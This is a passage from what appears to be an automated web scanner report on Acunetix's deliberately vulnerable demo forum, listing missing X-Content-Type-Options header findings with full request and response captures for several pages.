style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/robots.txt |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 216 bytes. |
GET http://testasp.vulnweb.com/robots.txt HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 245 bytes. |
HTTP/1.1 200 OK
Content-Type: text/plain Last-Modified: Mon, 06 May 2019 12:45:52 GMT Accept-Ranges: bytes ETag: "3629faa394d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:21 GMT Content-Length: 13 |
| Response Body - size: 13 bytes. |
User-agent: *
|
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a 